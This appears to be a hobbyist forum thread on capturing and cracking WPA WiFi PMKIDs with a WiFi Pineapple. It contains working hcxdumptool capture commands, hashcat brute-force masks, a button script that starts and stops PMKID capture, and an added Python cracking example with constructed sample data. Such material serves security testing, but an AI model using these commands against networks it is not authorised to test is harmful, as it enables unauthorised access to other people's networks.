PMKID Attack on WiFi Pineapples


Zylla

Recommended Posts

5 minutes ago, Zylla said:

So just a heads up that it might be a while until updates are coming, and the module i had started working on.

Ahhh man, that sucks. Hopefully you get back on track ASAP. Enjoy the break away from the keyboard?

9 hours ago, Just_a_User said:

Ahhh man, that sucks. Hopefully you get back on track ASAP. Enjoy the break away from the keyboard?

Thanks. I'm hoping to get back on track ASAP.

@Sleezybax
That'd be really helpful. I've got some components myself that could boost performance, like RAM and SSDs, lying around.
I'm not looking for a beast laptop for gaming and such, but still something that's stable and works.
Like, if I was to purchase a new one today in the stores, I'd probably focus on the CPU.
Do you have any details on the "asset" you mentioned?
Thanks a lot for attempting to help out.


2 minutes ago, PixL said:

OK, once I've captured a .pcapng file, how can I find out what SSIDs it has captured details for? Or do I have to manually compare BSSIDs?

When you convert to *.16800, you can cat the file and see each MAC/BSSID but no ESSID.

I started using filters to be more targeted against my test APs,

e.g.

hcxdumptool -o /root/PMKIDS/local.pcapng -i wlan1mon --enable_status 4 --filterlist /root/targetlist.txt --filtermode 2

This thing is so fast it can pick up car APs before they are out of range if you're not careful.


19 minutes ago, Just_a_User said:

This thing is so fast it can pick up car APs before they are out of range if you're not careful.

Only thing limiting it would be which channel it was scanning at the time I guess.


What I'm unsure of is whether there is any difference between using:

1. hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng   then using   hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'


7 hours ago, PixL said:

What I'm unsure of is whether there is any difference between using:

1. hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng   then using   hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

The hashcat forum thread says:

Quote

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow.


1 hour ago, PixL said:

Just_a_User:

Actually this is not what I mean. 16801 means you supply hashcat with pre-hashed PMKs as hex strings. My above question is about 16800, which is expecting a normal text file of passwords.

Oh shoot, my bad. All I found so far is hash-mode 16800 = WPA-PMKID-PBKDF2.


22 hours ago, PixL said:

OK, once I've captured a .pcapng file, how can I find out what SSIDs it has captured details for? Or do I have to manually compare BSSIDs?

OK, I've answered my own question: take the converted test.16800 file, open it in Notepad, copy the last column from each line (delimited by *) and convert it from hex to ASCII... voilà, you get your SSID.


On 8/22/2018 at 10:34 PM, Just_a_User said:

Just a note, the new version on the Tetra is back in action and the filters work a treat. This thing is so, so fast, it's amazing really. And perfect for the Pineapple's button script:

#!/bin/bash
# Pineapple button toggle: first press starts a PMKID capture, second press stops it,
# converts the capture to hashcat 16800 format and files everything under /root.
file="/tmp/handshake"
# Three random digits used as the name for this capture's output files.
capture="$(head -30 /dev/urandom | tr -dc '0123456789' | head -c3)"
if [ -f "$file" ]
then
        # Second press: stop the running capture and convert it.
        killall hcxdumptool
        led YELLOW off
        rm -f "$file"
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng "/root/$capture.pcapng"
        mv test.16800 "/root/$capture.16800"
        mv test.conlog "/root/$capture.conlog"
        mv test.log "/root/$capture.log"
else
        # First press: mark the capture as running and start hcxdumptool in the background.
        touch "$file"
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi

1. Click once and it starts capturing PMKIDs and lights the yellow LED.

2. Click again and it stops capturing, converts the data to 16800 and moves it to /root/random.pcapng and /root/random.16800, turns off the yellow LED and dumps a /root/random.log with the hcxdumptool output and /root/random.conlog with the hcxpcaptool output.


OK, so I've made a small script to convert the hex-encoded SSID back to text... can anyone improve on this and maybe make something that will take a list of PMKIDs and convert it to a list of SSIDs?

#!/bin/bash
# Decode a hex string (e.g. the last '*'-separated field of a 16800 line) back to text.
function hex2string () {
  I=0
  while [ "$I" -lt "${#1}" ]
  do
    # Take two hex digits at a time and emit the byte they encode.
    echo -en "\x${1:$I:2}"
    I=$((I + 2))
  done
  echo
}
read -p 'Hexstring: ' varname
hex2string "$varname"

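The two questions above, which SSIDs a .16800 file contains and whether -m 16800 differs from -m 2500, both come down to what a 16800 line holds and what hashcat checks against it. The example below is added here and is not code from the thread or from the hcxtools/hashcat projects: it parses the 16800 line format written by hcxpcaptool -z (PMKID*MAC_AP*MAC_CLIENT*ESSID_HEX), decodes the ESSID for every line at once, and performs the same check hashcat -m 16800 does per candidate (PBKDF2-HMAC-SHA1 of the passphrase salted with the ESSID, then HMAC-SHA1 over "PMK Name" || AP MAC || client MAC, first 16 bytes). The PBKDF2 step is the same cost as in -m 2500; the PMKID check simply replaces the PTK/MIC check, and -m 16801 is the same check with the PMK supplied directly. The sample "capture", MACs, ESSIDs and passphrases are constructed for the example.

```python
"""Parse a hashcat 16800 (WPA-PMKID-PBKDF2) file and verify candidate passphrases.

Added example, not code from the thread. hcxpcaptool -z writes one line per
captured PMKID:

    PMKID*MAC_AP*MAC_CLIENT*ESSID_HEX

PMKID = HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_CLIENT)[:16]
PMK   = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)
"""
from __future__ import annotations

import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class PmkidEntry:
    pmkid: bytes       # 16 bytes
    mac_ap: bytes      # 6 bytes, the BSSID
    mac_client: bytes  # 6 bytes, the station MAC
    essid: bytes       # raw ESSID bytes; real captures may contain non-UTF-8 names

    @property
    def bssid(self) -> str:
        return ":".join(f"{b:02x}" for b in self.mac_ap)

    @property
    def essid_text(self) -> str:
        # For display only; PBKDF2 is salted with the raw bytes, not the decoded text.
        return self.essid.decode("utf-8", errors="replace")


def parse_16800_line(line: str) -> PmkidEntry:
    """Parse one '*'-separated 16800 line; raises ValueError on malformed input."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError(f"expected 4 fields, got {len(fields)}: {line!r}")
    pmkid, mac_ap, mac_client, essid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_client) != 6:
        raise ValueError(f"bad field length in line: {line!r}")
    return PmkidEntry(pmkid, mac_ap, mac_client, essid)


def parse_16800_file(text: str) -> List[PmkidEntry]:
    return [parse_16800_line(l) for l in text.splitlines() if l.strip()]


def essid_inventory(entries: Iterable[PmkidEntry]) -> Dict[str, str]:
    """Answer 'which SSIDs did I capture?': BSSID -> decoded ESSID."""
    return {e.bssid: e.essid_text for e in entries}


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    # This is the expensive step, and it is identical for -m 2500 and -m 16800.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_client: bytes) -> bytes:
    # -m 16801 starts here, with the PMK given as hex instead of a passphrase.
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_client, hashlib.sha1).digest()[:16]


def check_candidate(entry: PmkidEntry, passphrase: str) -> bool:
    """The per-candidate test hashcat -m 16800 performs."""
    pmk = pmk_from_passphrase(passphrase, entry.essid)
    return hmac.compare_digest(pmkid_from_pmk(pmk, entry.mac_ap, entry.mac_client), entry.pmkid)


def crack(entries: Iterable[PmkidEntry], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Try every candidate against every entry; BSSID -> recovered passphrase or None."""
    entries, words = list(entries), list(wordlist)
    found: Dict[str, Optional[str]] = {e.bssid: None for e in entries}
    for e in entries:
        for w in words:
            if check_candidate(e, w):
                found[e.bssid] = w
                break
    return found


def make_16800_line(essid: str, bssid: str, client: str, passphrase: str) -> str:
    """Build a 16800 line for a known passphrase (used only to construct sample data)."""
    mac_ap = bytes.fromhex(bssid.replace(":", ""))
    mac_client = bytes.fromhex(client.replace(":", ""))
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid.encode()), mac_ap, mac_client)
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_client, essid.encode()))


# Constructed sample "capture": hypothetical networks, MACs and passphrases.
SAMPLE_16800 = "\n".join([
    make_16800_line("CoffeeShop", "00:11:22:33:44:55", "66:77:88:99:aa:bb", "summer2018"),
    make_16800_line("Lab-AP", "de:ad:be:ef:00:01", "ca:fe:f0:0d:00:02", "correct horse battery"),
])

if __name__ == "__main__":
    entries = parse_16800_file(SAMPLE_16800)
    for bssid, essid in essid_inventory(entries).items():
        print(f"{bssid}  {essid}")
    print(crack(entries, ["password", "summer2018", "letmein"]))
```

Point parse_16800_file at the contents of a real .16800 file and essid_inventory gives the BSSID-to-SSID list the thread was after in one go; crack is only there to make the verification step concrete, since at 4096 PBKDF2 rounds per candidate in pure Python it is no substitute for hashcat on a GPU.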

@Zylla

Sorry for the late reply, got hit by RL. Had a dig through the basement; was sure I still had a Lenovo T420 lying around. Turns out all I've got left of old stuff is an Acer something with just an i3 in it. So if CPU is what you're looking for, I doubt this one will be worth shipping.


On 9/2/2018 at 7:05 PM, cheeto said:

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you? I simply can't get this to work on Kali or Ubuntu (Raspberry Pi 3B+ version).

thanks!

It was working perfectly on my Kali installation until my laptop died.

I have an RPi 3B+, and I haven't tested it there myself; it should be working on it according to the developer (ZerBea).

Check that you have all dependencies installed before compiling.


12 hours ago, Zylla said:

I would also like to notify people (since it's been discussed earlier in the thread) that I was able to compile this without any problems on my Raspberry Pi 3B+.
And it's working perfectly.

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3B+?

I have Kali on my 3B+, but I think it's a patched-up version.

It's my understanding that there is no official version of Kali for the 3B+. Instead it's a modified version from the RPi 3. Right?

Also, doesn't PMKID require more GPU? If that's the case, I would imagine that it's pretty slow on the Nano and the RPi 3B+.

Thanks!!


5 hours ago, cheeto said:

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3B+?

I have Kali on my 3B+, but I think it's a patched-up version.

It's my understanding that there is no official version of Kali for the 3B+. Instead it's a modified version from the RPi 3. Right?

Also, doesn't PMKID require more GPU? If that's the case, I would imagine that it's pretty slow on the Nano and the RPi 3B+.

Thanks!!

Kali is based on Debian; the only "modified versions" I can think of are the images you can download containing the Nexmon patches, which let you run wlan0 in monitor mode (and AP mode at the same time).

But that's just a kernel patch.

Here's a link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID; you transfer the captures from the device to your desktop, which hopefully has a GPU or something.
